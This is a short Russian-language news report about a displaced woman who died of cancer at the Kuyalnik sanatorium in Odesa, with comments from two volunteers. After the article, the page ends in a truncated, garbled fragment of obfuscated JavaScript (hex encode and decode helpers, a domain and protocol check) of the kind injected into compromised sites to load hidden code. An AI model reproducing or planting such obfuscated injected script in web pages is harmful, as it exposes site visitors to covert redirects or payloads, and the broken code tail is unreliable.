Переселенка с «Куяльника» умерла от онкологии, – Ножевникова «фото»

Переселенка с «Куяльника» умерла от онкологии, – Ножевникова

 

куяльник санаторийКак сообщила корреспондент Украинской Службы Информации волонтер Катерина Ножевникова, у женщины было онкологическое заболевание на последней стадии. При этом, по словам волонтера, женщина лечение получала.

Одна жила. Умерла вчера. Лечение получала. Все это грустная жизненная история, – сказала Ножевникова.

По словам же соседки умершей, женщина вела довольно замкнутый образ жизни, была одинока, ее никто не посещал и помощь не оказывал.

Волонтер Павел Паламарчук на своей странице в Facebook выразил предположение, что смерть женщины может стать поводом для спекуляций и упреков.

Сегодня стало известно, что на Куяльнике от долгой и продолжительной тяжелокурируемой патологии скончалась переселенка. Ожидаем новой волны критики и истерии от псевдоволонтеров и ручных общественников  – “чиновники ООГА убили переселенку” и т.д. – написал волонтер.

Как сообщала USIonline.com, в Одессе переселенцы планируют объединяться в общественные организации.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e